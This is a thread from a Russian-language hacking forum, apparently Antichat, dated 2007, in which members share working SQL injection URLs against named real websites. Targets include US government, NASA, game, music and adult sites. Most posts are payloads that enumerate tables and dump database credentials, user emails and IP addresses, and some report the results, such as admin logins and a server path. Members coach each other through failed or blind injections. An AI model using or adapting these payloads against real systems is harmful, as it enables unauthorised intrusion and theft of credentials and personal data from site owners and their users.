SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Nazaret2005

    Nazaret2005 Member

    Joined:
    11 Aug 2007
    Messages:
    25
    Likes Received:
    14
    Reputations:
    -9
    http://www.viking.tm

    Code:
    http://www.viking.tm/product.php?id=-1+union+select+1,concat(user(),char(58),database()),version(),44,55,66,77/*
    http://www.vikinggames.hu

    Code:
    http://www.vikinggames.hu/product.php?id=-1+union+select+1,concat(user(),char(58),database()),version(),44,55,66,77/*
     
    #2901 Nazaret2005, 22 Aug 2007
    Last edited: 22 Aug 2007
    1 person likes this.
  2. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    баян, проверяй тут


    вот чтоб, не флудить
    Code:
    http://broker.uz/index.php?a=5&b=-384+union+select+1,2,3,4,5,6,7
    
    вывода нет (((( blind кажецо.

    ps точно не blind только все равно неинтересно... нашел сайт месяца 3 назад, такое впечатление, чтокромеменя здесь вообще никто не бывает.
     
    #2902 geezer.code, 23 Aug 2007
    Last edited: 23 Aug 2007
    1 person likes this.
  3. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Joined:
    25 Jan 2007
    Messages:
    284
    Likes Received:
    597
    Reputations:
    514
    >вывода нет (((( blind кажецо.
    Есть вывод смотри в ссылке там где картинка должна быть
    Code:
    http://broker.uz/index.php?a=5&b=-384+union+select+version(),2,3,4,5,6,7/*
    смотрим в ссылке на картинку:
    http://broker.uz/index.php?a=5&b=4.1.22-standard-log
    и т.д.
     
    #2903 [53x]Shadow, 23 Aug 2007
    Last edited: 23 Aug 2007
    3 people like this.
  4. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    Code:
    http://haytom.us/showarticle.php?id=-19+union+select+1,user(),version(),4,5/*
    Code:
    http://www.learningminds.us/article.php?id=-50708+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+users/*&act=print
     
    3 people like this.
  5. _-Ramos-_

    _-Ramos-_ Banned

    Joined:
    4 Jan 2007
    Messages:
    174
    Likes Received:
    215
    Reputations:
    8
    Порно сайт =))

    Code:
    http://karovideo.com/porno/directory.php?ax=list&sub=1&cat_id=-1/**/UNION/**/SELECT/**/1,2,3,4,concat(0x2D2D3E,email,0x3a,password),6,7,8,9,10,0x223E3C212D2D,12,13/**/from/**/links/*
    admin:admin
     
    2 people like this.
  6. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    Не получается подобрать названия колонок :(

    код:

    http://www.uraldev.ru/articles/index.php?id=-7+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
     
  7. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    5 версия
    Code:
    http://www.uraldev.ru/articles/index.php?id=-7+union+select+1,2,3,4,5,6,7,8,9,10,TABLE_NAME,12,13,14,15,16%20from%20INFORMATION_SCHEMA.TABLES/*
    
    Code:
    http://www.uraldev.ru/articles/index.php?id=-7+union+select+1,2,3,4,5,6,7,8,9,10,column_name,12,13,14,15,16%20from%20information_schema.columns/*
     
  8. Dr.Frank

    Dr.Frank Elder - Старейшина

    Joined:
    31 Jul 2002
    Messages:
    301
    Likes Received:
    72
    Reputations:
    12
    опять .gov:
    nea.gov:
    Code:
    http://www.nea.gov/honors/heritage/fellows/fellow.php?id=-1993_09%27+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(user,0x3a,password),0x3a),0x3a),3,4,5,AES_DECRYPT(AES_ENCRYPT(user(),0x3a),0x3a),AES_DECRYPT(AES_ENCRYPT(version(),0x3a),0x3a),8,9,10,11,12,13,14,15+from+mysql.user+limit+1,1/*
     
  9. Dr.Frank

    Dr.Frank Elder - Старейшина

    Joined:
    31 Jul 2002
    Messages:
    301
    Likes Received:
    72
    Reputations:
    12
    library01.gsfc.nasa.gov:
    Code:
    http://library01.gsfc.nasa.gov/search/images/imageslist.php?id=-470+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(user,0x3a,password),0x3a),0x3a),3,4,5,AES_DECRYPT(AES_ENCRYPT(user(),0x3a),0x3a),7,8,9,10,11,12,13,AES_DECRYPT(AES_ENCRYPT(version(),0x3a),0x3a),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47+from+mysql.user+limit+0,1/*&searchterm=everything&searchfield=entire
     
  10. t00th

    t00th Banned

    Joined:
    15 Jul 2007
    Messages:
    37
    Likes Received:
    15
    Reputations:
    6
    Вроде вывода нету,кто сможет вывести скажите как :)
    Code:
    http://www.amusic.hk/index.php?i=news&id=1'+union+select+id,password,3,4,5,6,7,8+from+a_users/*
    Не смог подобрать таблицы
    Code:
    http://www.gcc.ca/newsarticle.php?id=1+union+select+1,2,3,4,5/*
     
  11. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    Code:
    http://www.game-ost.ru/news_comments.php?id=-298+union+select+1,2,3,4,5,6,7,8,9,10/*
     
  12. x.Elf

    x.Elf Elder - Старейшина

    Joined:
    24 May 2007
    Messages:
    34
    Likes Received:
    18
    Reputations:
    0
    http://3d-sex-villa.info/?view=-1+union+select+version()/*
    дак вот ) там нет вывода на странице )
    http://3d-sex-villa.info/?image=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71)/*
    четвертый мускул....кому не лень - подбирайте таблицы...
    + еще:
    /home/sparkxxx/domains/3d-sex-villa.info/public_html/
     
    #2912 x.Elf, 23 Aug 2007
    Last edited: 23 Aug 2007
    1 person likes this.
  13. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    www.akabel.ru:
     
    1 person likes this.
  14. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    www.shopping-spb.ru (вывод в тайтл):
     
  15. Dr.Frank

    Dr.Frank Elder - Старейшина

    Joined:
    31 Jul 2002
    Messages:
    301
    Likes Received:
    72
    Reputations:
    12
    2t00th:
    Code:
    http://www.amusic.hk/index.php?i=news&id=1%27+union+select+1,2,3,4,concat(id,0x3a,password),version(),7,8+from+a_users/*
     
    3 people like this.
  16. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    Code:
    http://www.gamesector.org/review.php?id=-225+union+select+1,2,concat_ws(0x3a,id,name,email,ip_address),4,5,6,7+from+ibf_members/*
     
  17. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    MS SERVER.

     
  18. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    походу тут интересно,жаль я не очень пока разбираюсь что с этим дальше делать :(

    код:

    http;//www.webmarket.mobi/ wm.php?id=-3+unio n+select+1 ,column_ name ,3 ,4 ,5 , 6+from+informatio n_schema.col umns/*
     
  19. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    код:
    http://www.ezgulik.org/news.php?id=-197+union+select+1,2,3,user(),5,6/*
    мускул 4 версии
     
  20. Nazaret2005

    Nazaret2005 Member

    Joined:
    11 Aug 2007
    Messages:
    25
    Likes Received:
    14
    Reputations:
    -9

    Делай вот так
    тут тебе показано,какие таблицы и где находятся...

    Странно Can't select from table:



    вот что то есть

    Code:
    http://www.webmarket.mobi/wm.php?id=-3+union+select+1,logn,pasw,4,u_id,6+from+users3/*
     
    #2920 Nazaret2005, 23 Aug 2007
    Last edited: 23 Aug 2007
Thread Status:
Not open for further replies.